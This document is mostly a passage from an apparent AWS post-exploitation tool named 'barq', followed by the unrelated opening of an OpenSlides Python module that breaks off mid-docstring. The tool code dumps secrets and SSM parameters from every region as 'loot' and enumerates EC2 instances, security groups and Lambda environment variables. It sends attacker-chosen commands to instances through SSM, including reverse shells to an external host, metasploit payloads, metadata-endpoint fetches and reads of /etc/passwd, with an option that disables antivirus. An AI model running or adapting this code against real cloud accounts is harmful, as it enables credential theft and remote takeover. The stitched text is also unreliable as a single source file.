get_instance_details('ec2instances')
elif command == 'exit':
exit()
instances_loop()
def instances_loop():
"""
The command handler loop for the EC2 instances menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instancecomplete)
command = raw_input('barq '+color('instances','blue')+' > ')
except Exception as e:
print(e)
command = str(command)
process_instances_command(command)
except KeyboardInterrupt as k:
print("CTRL+C pressed.")
choice = prompt.query(color("Are you sure you want to go back to the main menu? Y/N",'red'), default='Y')
if choice == 'Y':
menu_backward()
else:
instances_loop()
def main_loop():
"""
The command handler loop for the main menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(maincomplete)
command = raw_input('barq '+color('main','green')+' > ')
except Exception as e:
exit()
#command = prompt.query('aws sheller main> ', validators=[])
command = str(command)
process_main_command(command)
except KeyboardInterrupt as k:
print(color("CTRL+C pressed. Exiting...",'red'))
exit()
def process_main_command(command):
"""
Process command in the main menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
main_help()
elif command == 'where':
puts(colored.green('You are in the main menu'))
elif command == 'back':
puts(colored.green('You are the at the top menu.'))
elif command == 'exit':
#cleanup tasks
try:
exit()
except:
pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
elif command == 'showsecrets':
show_cred_loot('main')
elif command == 'securitygroups':
get_security_groups('main')
elif command == 'training':
#menu_stack.append('training')
#handle_menu()
menu_forward('training')
elif command == 'ec2instances':
menu_forward('ec2instances')
main_loop()
def find_all_creds(caller):
"""
Find Secrets and Parameters stored in AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to.
:return: None
"""
global my_aws_creds
global loot_creds
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
puts(color('[..] Now iterating over all regions to get secrets and parameters...'))
for region in possible_regions:
puts(color('[*] Region currently searched for secrets: %s'%region))
puts(color('[..] Now searching for secrets in Secret Manager'))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
#mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region, aws_session_token=my_aws_creds['aws_session_token'])
secretsclient = mysession.client(service_name='secretsmanager',region_name=region)
try:
secrets = secretsclient.list_secrets()['SecretList']
secretnames = []
for secret in secrets:
secretnames.append(secret['Name'])
for name in secretnames:
resp = secretsclient.get_secret_value(SecretId=name)
puts(colored.magenta("Secret Name: %s" %name))
puts(colored.magenta("Secret Value: %s" %resp['SecretString']))
resp2 = secretsclient.describe_secret(SecretId=name)
description = resp2.get('Description','')
loot_creds['secrets'].append({'name':name,'value':resp['SecretString'],'description':description})
except Exception as e:
print(e)
puts(color('[!] No secrets in this region\'s Secret Manager...'))
puts(color('[..] Now searching for secrets in Parameter Store'))
ssmclient = mysession.client('ssm',region_name=region)
try:
paramresponse = ssmclient.describe_parameters()
paramnames = []
for param in paramresponse.get('Parameters',[]):
if param.get('Name','') != '':
paramnames.append(param.get('Name'))
if len(paramnames) > 0:
getparamsresponse = ssmclient.get_parameters(Names=paramnames,WithDecryption=True).get('Parameters')
for getparam in getparamsresponse:
puts(colored.magenta("Parameter Name: %s, Parameter Value: %s" %(getparam['Name'], getparam['Value'])))
loot_creds['parameters'].append({'name':getparam['Name'],'value':getparam['Value']})
except Exception as e:
print(e)
puts(color('[!] No Paramters in this region\'s Parameter Store...'))
puts(color("[+] Done iterating on AWS secrets and parameters."))
go_to_menu(caller)
def show_cred_loot(caller):
"""
Show Secrets and Parameters looted from AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to
:return: None
"""
global loot_creds
try:
if len(loot_creds.get('secrets')) < 1:
puts(color('[!] You have no stored secrets or parameters. Run the command dumpsecrets to set them'))
go_to_menu(caller)
puts(color('[*] Your collected secrets and credentials:'))
for secret in loot_creds['secrets']:
puts(color("===========",'blue'))
puts(color('[+] Name: %s'%secret.get('name')))
puts(color('[+] Value: %s' % secret.get('value')))
puts(color('[+] Description: %s' % secret.get('description')))
#puts(colored.green('name: %s, value: %s, description: %s'%(secret.get('name'),secret.get('value'), secret.get('description',''))))
for param in loot_creds['parameters']:
puts(color("===========", 'blue'))
puts(color('[+] Name: %s' % param.get('name')))
puts(color('[+] Value: %s' % param.get('name')))
#puts(colored.green('name: %s, value: %s'%(param.get('name'),param.get('value'))))
except Exception as e:
print(e)
puts(color('[!] A problem in finding stored secrets or parameters. Run the command dumpsecrets to set them'))
go_to_menu(caller)
def get_ec2_instances(caller):
"""
List discovered EC2 instances.
:param caller: Calling menu to return to.
:return: None
"""
global ec2instances
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
for ins in ec2instances['instances']:
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
print(instances_table)
except:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
def get_security_groups(caller):
"""
List security groups discovered.
:param caller: calling menu to return to.
:return: None
"""
global secgroups
try:
puts(color('[*] Your collected security groups, if you want an updated list, invoke attacksurface:'))
for group in secgroups['groups']:
puts(colored.green("Group ID: %s"%group.get('id','')))
puts(colored.green("Group description: %s"%group.get('description','')))
puts(colored.green('Group Ingress IP permissions:'))
for p in group['ip_permissions']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.green('Group Egress IP permissions:'))
for p in group['ip_permissions_egress']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.magenta('======================================='))
except Exception as e:
print(e)
puts(color('[!] You have no stored security groups. Run the command attacksurface to discover them'))
go_to_menu(caller)
def ec2attacks(caller):
"""
Perform various attacks against All eligible EC2 instances in the account, or choose a single EC2 instance to attack.
:param caller: Calling menu to return to.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
linux = False
windows = False
actual_targets = []
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances, if you want an updated list, invoke attacksurface:'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name', 'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
if ins.get('iam_profile','') != '' and ins.get('state','') == 'running':
instances_table.add_row([ins.get('id'),ins.get('platform'),ins.get('region'),ins.get('state'),ins.get('public_ip_address'),
ins.get('public_dns_name'),ins.get('iam_profile','')])
actual_targets.append(ins)
INSTANCESIDCOMMANDS.append(ins['id'])
if ins.get('platform') == 'linux':
linux = True
else:
windows = True
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
target_options = [{'selector':'1','prompt':'All EC2 instances','return':'all'},
{'selector':'2', 'prompt':'Single EC2 instance', 'return':'single'}]
target = prompt.options('Choose your target:', target_options)
if target == 'single':
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
if target == "all":
agree = prompt.query('This is will launch the same attack on all EC2 instances. This is a very risk move! Do you want to proceed? Y/N?', default="N")
if agree != 'Y':
go_to_menu(caller)
puts(color('[*] EC2 Attack List:'))
attack_options = [{'selector':'1','prompt':'Download EC2 metadata and userdata (custom init script)','return':'metadata'},
{'selector':'2', 'prompt':'Display a file', 'return':'printfile'},
{'selector':'3','prompt':'Visit a URL from inside EC2 instance','return':'URL'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'Run a command','return':'command'},
{'selector':'6','prompt':'Reverse Shell to external server','return':'reverseshell'}]
attack = prompt.options('Choose your attack mode:', attack_options)
if target != 'all':
success = attack_single_target(caller,target, attack)
elif target == "all":
targets = actual_targets
success = attack_multiple_targets(mysession,caller,targets, attack, linux, windows)
puts(color('[+] Done launching attacks. Check command results with commandresults option.'))
go_to_menu(caller)
def attack_single_target(caller,target, attack):
"""
Launch an attack on a single EC2 instance.
:param caller: Calling menu to return to.
:param target: Target EC2 instance id
:param attack: The attack to launch.
:return: True
"""
global ec2instances
target_id = ''
target_platform = ''
target_state = ''
target_region = ''
disableav = False
for ins in ec2instances['instances']:
if ins.get('id') == target:
target_id = target
target_platform = ins.get('platform')
target_state = ins.get('state')
target_region = ins.get('region')
if target_state != 'running':
puts(color('[!] The chosen target is not running! Exiting...'))
go_to_menu(caller)
if target_platform == 'linux':
action = 'AWS-RunShellScript'
else:
action = 'AWS-RunPowerShellScript'
remote_ip_host = ''
remote_port = ''
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('You chose %s option. First provide your remote IP and port to explore shell options.' %attack))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if attack == "reverseshell":
attack, action = reverseshell_options(remote_ip_host, remote_port, target_platform)
elif attack == "msf":
attack, action = metasploit_installed_options(remote_ip_host, remote_port, target_platform)
disableav = True
elif attack == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if target_platform == 'linux':
attack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
attack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
if target_platform == 'linux':
attack = PRINT_EC2_METADATA_CMD
else:
attack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
filepath = prompt.query('Enter the full file path: ', default="/etc/passwd")
attack = "cat %s" %filepath
elif attack == "command":
attack = prompt.query('Enter the full command to run: (bash for Linux - Powershell for Windows)', default="cat /etc/passwd")
disableav = True
puts(colored.cyan('Sending the command "%s" to the target instance %s....'%(attack,target)))
mysession = set_session_region(target_region)
ssmclient = mysession.client('ssm')
if target_platform == 'linux':
success = run_linux_command(ssmclient,target,action,attack)
else:
success = run_windows_command(ssmclient,target, action, attack, disableav)
return True
def attack_multiple_targets(mysession,caller,targets, attack, linux, windows):
"""
Launch commands against multiple EC2 instances
:param mysession: boto3 session object.
:param caller: calling menu to return to.
:param targets: List of target EC2 instances
:param attack: The attack/command type
:param linux: Whether or not Linux is included in the targets.
:param windows: Whether or not Windows is included in the targets.
:return: None
"""
global command_invocations
global logger
windowsaction = 'AWS-RunPowerShellScript'
linuxaction = 'AWS-RunShellScript'
disableav = False
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('Make sure your shell listener tool can handle multiple simultaneous connections!'))
disableav = True
if attack == "reverseshell":
linuxattack, windowsattack = reverseshell_multiple_options(linux, windows)
elif attack == "msf":
linuxattack, windowsattack = metasploit_installed_multiple_options(linux, windows)
elif attack == "URL":
puts(color('[*] Choose the URL to visit from inside the EC2 instances:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
linuxattack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
windowsattack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
linuxattack = PRINT_EC2_METADATA_CMD
windowsattack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
linuxfilepath = prompt.query('(Ignore if linux is not targeted)Enter the full file path for Linux instances: ', default="/etc/passwd")
windowsfilepath = prompt.query('(Ignore if Windows is not targeted)Enter the full file path for Windows instances: ', default="C:\\Windows\\System32\\drivers\\etc\\hosts")
linuxattack = "cat %s" %linuxfilepath
windowsattack = "cat %s" %windowsfilepath
elif attack == "command":
linuxattack = prompt.query('(Ignore if linux is not targeted)Enter the full bash command to run: ', default="whoami")
windowsattack = prompt.query('(Ignore if Windows is not targeted)Enter the full Powershell command to run: ', default="whoami")
disableav = True
logger.error("before running threaded attacks")
for target in targets:
if target['platform'] == 'linux' and linux and target.get('iam_profile','') != '' and linuxattack != '':
#run_threaded_linux_command(mysession,target,linuxaction,linuxattack)
logger.error("running run_threaded_linux_command for %s" %target['id'])
linuxthread = Thread(target=run_threaded_linux_command, args=(mysession, target,linuxaction,linuxattack))
linuxthread.start()
logger.error("after running run_threaded_linux_command for %s" % target['id'])
if target['platform'] == 'windows' and windows and target.get('iam_profile','') != '' and windowsattack != '':
logger.error("running run_threaded_windows_command for %s" % target['id'])
#run_threaded_windows_command(mysession,target,windowsaction,windowsattack)
windowsthread = Thread(target=run_threaded_windows_command, args=(mysession, target,windowsaction,windowsattack,disableav))
windowsthread.start()
logger.error("after run_threaded_windows_command for %s" % target['id'])
#TODO: Decide best approach to launching and looping
#loop over instances launching attack against each
#loop over results.
def check_command_invocations(caller):
"""
Check stored results of previously executed attacks on EC2 instances.
:param caller: calling menu
:return: None
"""
global command_invocations
if len(command_invocations['commands']) < 1:
puts(color('[!] You don\'t have any commands run yet against EC2 targets. Run ec2attacks to launch commands.'))
go_to_menu(caller)
for command in command_invocations['commands']:
puts(colored.green('command id: %s'%command.get('id') ))
puts(colored.green('command instance id: %s'%command.get('instanceid') ))
puts(colored.green('command state: %s'%command.get('state')))
puts(colored.green('command platform: %s'%command.get('platform')))
puts(colored.green('command region: %s'%command.get('region') ))
try:
puts(colored.green('command error: %s'%command.get('error','No errors')[0:5000]))
except:
pass
try:
puts(colored.green('command output: %s'%command.get('output', 'No output')[0:5000] ))
except:
pass
puts(colored.magenta('======================================='))
def find_attacksurface(caller):
"""
Find the attack surface of this AWS account. Currently looks for EC2 instances and Security Groups.
:param caller: calling menu
:return: None
"""
global my_aws_creds
global ec2instances
global secgroups
global lambdafunctions
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No AWS credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2instances = {'instances':[]}
secgroups = {'groups':[]}
puts(color('[..] Now iterating over all regions to discover public attack surface...'))
for region in possible_regions:
puts(color('[*] Region currently searched for details: %s'%region))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
ec2resource = mysession.resource('ec2')
lambdaclient = mysession.client('lambda')
instances = ec2resource.instances.all()
puts(color('[..] Now searching for details of EC2 instances'))
for instance in instances:
puts(color('[..] Now checking instance with id: %s'%instance.instance_id))
puts(color('[+] Public host name: %s'%instance.public_dns_name))
puts(color('[+] Public IP: %s'%instance.public_ip_address))
platform = ''
if instance.platform == "windows":
platform = 'windows'
puts(color('[+] OS is: Windows'))
else:
platform = 'linux'
puts(color('[+] OS is: Linux'))
puts(color('[+] AMI id: %s'%instance.image_id))
puts(color('[+] State: %s'%instance.state['Name']))
puts(color('[+] Region: %s'%region))
profile = instance.iam_instance_profile
if profile:
profile = profile['Arn'].rsplit('/',1)[-1]
else:
profile = ''
puts(colored.magenta(''))
ec2instances['instances'].append({'id':instance.instance_id,'public_dns_name':instance.public_dns_name,'public_ip_address':instance.public_ip_address,
'platform':platform,'ami_id':instance.image_id,'state':instance.state['Name'],'region':region,'iam_profile':profile})
puts(color('[..] Now searching for details of security groups'))
security_groups = ec2resource.security_groups.all()
for group in security_groups:
thisgroup = {}
thisgroup['description'] = group.description
thisgroup['id'] = group.id
puts(colored.magenta("group id: %s" %group.id))
puts(colored.magenta( "group ip permissions"))
ip_permissions = []
for rule in group.ip_permissions:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
if ranges == '':
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Ingress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
puts(colored.magenta( "group ip permissions egress"))
ip_permissions_egress = []
for rule in group.ip_permissions_egress:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
if ranges == '':
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Ingress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions_egress.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
thisgroup['ip_permissions'] = ip_permissions
thisgroup['ip_permissions_egress'] = ip_permissions_egress
secgroups['groups'].append(thisgroup)
puts(color('[..] Now searching for details of lambda functions'))
function_results = lambdaclient.list_functions()
functions = function_results['Functions']
for function in functions:
function_name = function['FunctionName']
function_arn = function['FunctionArn']
function_runtime = function.get('Runtime','')
function_role = function.get('Role','')
function_description = function.get('Description','')
function_Environment = function.get('Environment',{})
puts(color('[+] Function Name: %s'%function_name))
puts(color('[+] Function ARN: %s'%function_arn))
puts(color('[+] Function Runtime: %s'%function_runtime))
puts(color('[+] Function Role: %s'%function_role))
puts(color('[+] Function Description: %s'%function_description))
puts(color('[+] Function Environment variables: %s'%function_Environment))
lambdafunctions['functions'].append({'name':function_name,'function_arn':function_arn,'function_runtime':function_runtime,
'function_role':function_role,'function_description':function_description,'function_Environment':function_Environment,'region':region})
go_to_menu(caller)
def set_aws_creds(caller):
"""
Set the AWS credentials of the targeted AWS account.
:param caller: Calling menu
:return: None
"""
global menu_stack
global my_aws_creds
readline.set_completer(None)
aws_access_key_id = getpass('Enter your AWS Access Key ID:')
puts(color("[*] Key id is: %s************%s"%(aws_access_key_id[0:2],aws_access_key_id[-3:-1])))
aws_secret_access_key = getpass('Enter AWS Secret Access Key:')
puts(color("[*] secret key is: %s************%s"%(aws_secret_access_key[0:2],aws_secret_access_key[-3:-1])))
aws_session_token = getpass("Enter your session token, only if needed: ")
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2')
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name='us-west-2', aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
choose_your_region = False
possible_regions = []
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
elif "UnauthorizedOperation" in str(e):
choose_your_region = True
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
print(e)
if choose_your_region == False:
go_to_menu(caller)
if choose_your_region == True:
chosen_region = prompt.query('What is your preferred AWS region?',default='us-west-2')
else:
regions = regionresponse['Regions']
region_table = PrettyTable(['Region'])
possible_regions = []
for region in regions:
region_table.add_row([region['RegionName']])
possible_regions.append(region['RegionName'])
print(region_table)
chosen_region = prompt.query('What is your preferred AWS region?',default='us-west-2')
if chosen_region not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=chosen_region,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':chosen_region,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)#menu_backward()
def set_aws_creds_inline(aws_access_key_id,aws_secret_access_key,region_name,aws_session_token):
"""
Set AWS credentials to the target account from the command line arguments directly, no prompts.
:param aws_access_key_id: access key id
:param aws_secret_access_key: access secret key
:param region_name: region name
:param aws_session_token: token, if any
:return: None
"""
global my_aws_creds
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name, aws_session_token=aws_session_token)
ec2client = mysession.client('ec2')
regionresponse = ''
try:
regionresponse = ec2client.describe_regions()
except Exception as e:
if "OptInRequired" in str(e):
puts(color("[!] OptInRequired Error: The keys are valid but you have a problem in your AWS account."
"Your account may be under validation by AWS. Is it a new account?"))
else:
puts(color("[!] Error accessing AWS services. Double check your AWS keys, tokens, privileges and region."))
exit()
regions = regionresponse['Regions']
possible_regions = []
for region in regions:
possible_regions.append(region['RegionName'])
if region_name not in possible_regions:
puts(color("[!] Invalid AWS region! Exiting...."))
exit()
if aws_session_token == '':
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name)
else:
mysession = boto3.session.Session(aws_access_key_id=aws_access_key_id,aws_secret_access_key=aws_secret_access_key,region_name=region_name,aws_session_token=aws_session_token)
my_aws_creds = {'aws_access_key_id':aws_access_key_id,'aws_secret_access_key':aws_secret_access_key,'region_name':region_name,'aws_session_token':aws_session_token,'session':mysession,'possible_regions':possible_regions}
def show_aws_creds(caller):
"""
List AWS credentials used to connect to this AWS account.
:param caller: calling menu
:return: None
"""
global menu_stack
global my_aws_creds
if my_aws_creds == {}:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command setprofile to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
try:
puts(color('[+] Your AWS credentials:'))
puts(color('[*] access key id: %s'%my_aws_creds['aws_access_key_id']))
puts(color('[*] secret access key: %s'%my_aws_creds['aws_secret_access_key']))
puts(color('[*] session token: %s'%my_aws_creds['aws_session_token']))
puts(color('[*] region: %s'%my_aws_creds['region_name']))
except:
puts(color('[!] You haven\'t set your AWS credentials yet. Run the command dumpsecrets to set them'))
#menu_stack.append(caller)
#handle_menu()
go_to_menu(caller)
def main_help():
"""
Display Main Menu help options.
:return: None
"""
print(""" Main Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
training - Go to training mode
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
addtosecgroups - Add IPs and ports to security groups
persistence - Add persistence and hide deeper
ec2instances - Go to EC2 instances menu
securitygroups - List all discovered Security Groups
""")
main_loop()
MAINCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'training','dumpsecrets','attacksurface','addtosecgroups','persistence','ec2instances','securitygroups']
def maincomplete(text, state):
"""
Autocomplete for the main menu commands.
"""
for cmd in MAINCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def training_help():
"""
Display command options for the training menu.
:return: None
"""
print(""" Training Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
start - Start training mode
""")
training_loop()
TRAININGCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'start']
def trainingcomplete(text, state):
"""
Autocomplete for training menu.
"""
for cmd in TRAININGCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
def instances_help():
"""
Display command options for the EC2 instances menu.
:return:
"""
print(""" EC2 instances Help menu
================
help - print this menu
where - find where you are in the program
back - Go back to the previous menu
exit - Exit the program
setprofile - Set your AWS credentials
showprofile - Show your AWS credentials
showsecrets - Show credentials and secrets acquired from the target AWS account
ec2attacks - Launch attacks against running EC2 instances
list - List all discovered EC2 instances
dumpsecrets - Gather and dump credentials of EC2 in Secrets Manager and Parameter Store
attacksurface - Discover attack surface of target AWS account
securitygroups - List all discovered Security Groups
commandresults - Check command results
instance - Get more details about an instance
""")
instances_loop()
INSTANCESCOMMANDS = ['help', 'where', 'back', 'exit', 'setprofile', 'showprofile', 'showsecrets',
'ec2attacks','dumpsecrets','attacksurface','list','commandresults','securitygroups', 'instance']
def instancecomplete(text, state):
"""
Autocomplete for EC2 instances menu
"""
for cmd in INSTANCESCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
asciilogo = """
.
:y-
:yy:
/ys/:`
/yo/::-
/y+/::::`
+y/+:::::-
+s:+:::::::`
`+s-+::::::::-
`oo.o/:::::::-`
`o+.o/::::::::
`o/`s/::::::/o:
`o:`s+::::::/sy`
.o-`s+-----::+++..........`
` .+.`so-------------------::` .`
``.--` .+``so-----:::::::::-----:-` oys+-.`
`..---..` ./ `ys----::/+++++oo/----:- .:+yhhyo:.`
`.----.`` .: `ys:---::+oyssooo+----::....``` .-+shhyo/-`
``.----.`` .- `yh+++++ooooo+//::----:. `` ` `-/oyhhs+:``
.----.` .. :/::-..`` `-----:--:/+o/ ` .:+ydhy:
.----.` .` `..-----/ssssss+ `. `.:oydhy:
``.----.` ` ``.-:/+os/----:+ysssss+ .- `-/oydhy+:.
``.----.`` `.--:/+ooossssy/----:+osssss+` -- `-+shhhs/-`
`..---..` ```` `-ooooosyys+/::ossoooo+` :- `:oyddyo:.
``.--` /oooosyyyysooosooooo+` /- shs+-`
`+ooooooooooooooooooo+` `+- `
.oooooooooooooooooooo+` .o-
.//////////yyyso+++++` -s-
yys++++++` :s-
oo++++++. /s-
`/++++++.`+o.
./++++++.`oo.
:////+/..so-
./////.:y+-
`////-/y+-
://-+y+-
./:oy+-
`/sy/-
oy/-
//-
`--. `-
-dd/
-dd/`-:-` `.----.` `..``---` `---``..
-ddysyhdy: :sooooys: /yyossss/ -sysoosyy`
-ddy` `ydh` ..---:sys /yy+` `` `yyo` `syy`
-dd+ odd. .oyyo++yyy /yy. .yy/ +yy`
-ddy``.hdh /yy: `yyy /yy. `yys```syy`
-hhsyyhhy- .sys++osyy /yy. -syyossyy`
`..``--. ..-. ... `.. .-. +yy`
+yy`
`..
"""
start()
|
main.py
|
import argparse
import ctypes
import os
import sys
import tempfile
import threading
import time
import webbrowser
from typing import Dict, Optional
from django.conf import ENVIRONMENT_VARIABLE
from django.core.exceptions import ImproperlyConfigured
from django.utils.crypto import get_random_string
from mypy_extensions import NoReturn
DEVELOPMENT_VERSION = "Development Version"
UNIX_VERSION = "Unix Version"
WINDOWS_VERSION = "Windows Version"
WINDOWS_PORTABLE_VERSION = "Windows Portable Version"
class PortableDirNotWritable(Exception):
pass
class PortIsBlockedError(Exception):
pass
class DatabaseInSettingsError(Exception):
pass
class UnknownCommand(Exception):
pass
class ExceptionArgumentParser(argparse.ArgumentParser):
def error(self, message: str) -> NoReturn:
raise UnknownCommand(message)
def detect_openslides_type() -> str:
"""
Returns the type of this OpenSlides version.
"""
if sys.platform == "win32":
if os.path.basename(sys.executable).lower() == "openslides.exe":
# Note: sys.executable is the path of the *interpreter*
# the portable version embeds python so it *is* the interpreter.
# The wrappers generated by pip and co. will spawn the usual
# python(w).exe, so there is no danger of mistaking them
# for the portable even though they may also be called
# openslides.exe
openslides_type = WINDOWS_PORTABLE_VERSION
else:
openslides_type = WINDOWS_VERSION
else:
openslides_type = UNIX_VERSION
return openslides_type
def get_default_settings_dir(openslides_type: str = None) -> str:
"""
Returns the default settings path according to the OpenSlides type.
The argument 'openslides_type' has to be one of the three types mentioned in
